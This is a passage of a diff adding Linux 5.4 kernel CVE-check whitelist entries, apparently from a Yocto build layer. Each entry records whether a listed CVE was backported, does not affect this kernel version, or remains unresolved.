+# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3625"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3628"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-36280"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3629"
+
+# fixed-version: only affects 5.19rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3630"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3633"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3635"
+
+# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 5.19 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3640"
+
+# CVE-2022-36402 needs backporting (fixed from 6.5)
+
+# CVE-2022-3642 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2022-3643"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3646"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3649"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-36879"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-36946"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2022-3707"
+
+# CVE-2022-38096 has no known resolution
+
+# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
+
+# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
+
+# fixed-version: only affects 5.18 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3910"
+
+# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-39189"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-39190"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3977"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-39842"
+
+# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-40307"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-40476"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-40768"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4095"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2022-40982"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-41218"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-41222"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4127"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4128"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2022-4129"
+
+# fixed-version: only affects 5.17rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4139"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-41674"
+
+# CVE-2022-41848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41849"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41850"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-41858"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42328"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42329"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-42432"
+
+# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-42703"
+
+# cpe-stable-backport: Backported in 5.4.219
+CVE_CHECK_WHITELIST += "CVE-2022-42719"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42720"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42721"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42722"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-42895"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-42896"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-43750"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4378"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4379"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2022-4382"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-43945"
+
+# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-4543 has no known resolution
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45869"
+
+# CVE-2022-45884 has no known resolution
+
+# CVE-2022-45885 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45886"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45887"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45888"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45919"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-45934"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4662"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4696"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2022-4744"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47518"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47519"
+
+# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47521"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-47929"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47938"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47939"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47940"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47941"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47942"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47943"
+
+# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4842"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48423"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48424"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48425"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48502"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-48619"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-48626"
+
+# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
+
+# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-48629"
+
+# fixed-version: only affects 5.17 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48630"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2023-0030"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0045"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2023-0047"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0122"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-0160"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0179"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0210"
+
+# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0266"
+
+# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0394"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2023-0458"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2023-0459"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0461"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0468"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0469"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-0590"
+
+# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.223
+CVE_CHECK_WHITELIST += "CVE-2023-0615"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1032"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1073"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1074"
+
+# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1076"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1077"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1078"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1079"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2023-1095"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1118"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1192"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1193"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1194"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1195"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1206"
+
+# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1252"
+
+# CVE-2023-1281 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1295"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-1380"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2023-1382"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2023-1390"
+
+# CVE-2023-1476 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1513"
+
+# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1583"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1611"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2023-1637"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1652"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1670"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1829"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-1838"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1855"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2023-1859"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1872"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1989"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1990"
+
+# fixed-version: only affects 5.19rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1998"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2002"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2006"
+
+# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2023-2008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2019"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2023-20569"
+
+# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
+
+# cpe-stable-backport: Backported in 5.4.250
+CVE_CHECK_WHITELIST += "CVE-2023-20593"
+
+# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
+
+# CVE-2023-20937 has no known resolution
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-20938"
+
+# CVE-2023-20941 has no known resolution
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21102"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21106"
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-2124"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21255"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21264"
+
+# CVE-2023-21400 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2156"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-2162"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2163"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2166"
+
+# CVE-2023-2176 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2023-2177"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2194"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2235"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2236"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2248"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2269"
+
+# CVE-2023-22995 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22996"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22997"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22998"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-22999"
+
+# CVE-2023-23000 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23001"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23002"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23003"
+
+# CVE-2023-23004 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23005"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2023-23006"
+
+# CVE-2023-23039 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23454"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-23455"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-23559"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-23586"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2430"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-2483"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25012"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-2513"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-25775"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2598"
+
+# CVE-2023-26242 has no known resolution
+
+# CVE-2023-2640 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26544"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-26545"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26605"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-26606"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2023-26607"
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2023-28327"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-28328"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28410"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28464"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-28466"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2023-2860"
+
+# CVE-2023-28746 needs backporting (fixed from 6.9rc1)
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2023-28772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-28866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2898"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-2985"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3006"
+
+# Skipping CVE-2023-3022, no affected_versions
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-30456"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-30772"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3090"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2023-3106"
+
+# Skipping CVE-2023-3108, no affected_versions
+
+# CVE-2023-31081 has no known resolution
+
+# CVE-2023-31082 has no known resolution
+
+# CVE-2023-31083 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-31084 needs backporting (fixed from 6.4rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-31085"
+
+# cpe-stable-backport: Backported in 5.4.247
+CVE_CHECK_WHITELIST += "CVE-2023-3111"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3117"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-31248"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2023-3141"
+
+# cpe-stable-backport: Backported in 5.4.242
+CVE_CHECK_WHITELIST += "CVE-2023-31436"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2023-3159"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3161"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3212"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-3220"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-32233"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32247"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32248"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32250"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32252"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32254"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32257"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-32258"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-32269"
+
+# CVE-2023-32629 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-3268"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3269"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3312"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3317"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-33203"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33250"
+
+# CVE-2023-33288 needs backporting (fixed from 6.3rc4)
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3338"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3355"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3357"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-3358"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3359"
+
+# CVE-2023-3389 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3390"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33951"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-33952"
+
+# CVE-2023-3397 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.249
+CVE_CHECK_WHITELIST += "CVE-2023-34255"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-34256"
+
+# fixed-version: only affects 6.1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34319"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-34324"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3439"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-35001"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-3567"
+
+# CVE-2023-35693 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2023-35788"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35823"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35824"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35826"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-35827"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-35828"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-35829"
+
+# cpe-stable-backport: Backported in 5.4.248
+CVE_CHECK_WHITELIST += "CVE-2023-3609"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3610"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-3611"
+
+# CVE-2023-3640 has no known resolution
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-37453"
+
+# CVE-2023-37454 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-3772"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3773"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3776"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3777"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2023-3812"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38409"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38426"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38427"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38428"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38429"
+
+# fixed-version: only affects 5.15rc1 onwards
